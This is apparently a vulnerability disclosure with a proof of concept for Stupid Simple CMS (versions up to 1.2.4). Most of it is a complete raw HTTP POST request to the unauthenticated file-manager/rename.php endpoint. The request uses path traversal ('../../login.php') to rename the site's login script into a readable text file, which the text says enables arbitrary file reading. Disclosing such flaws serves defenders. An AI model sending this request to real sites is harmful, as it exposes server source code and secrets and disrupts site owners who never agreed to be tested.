product: Stupid Simple CMS ( Blogger )
download link: https://github.com/codelyfe/Stupid-Simple-CMS
version:<=1.2.4
POC:
POST http://localhost/file-manager/rename.php HTTP/1.1
Host: localhost
Content-Length: 36
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/file-manager/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
oldName=../../login.php&newName=1.txtThe code audit found that the file renaming interface has no authentication measures, which can cause arbitrary file reading.
代码审计发现文件重命名接口无鉴权措施,可导致任意文件读取




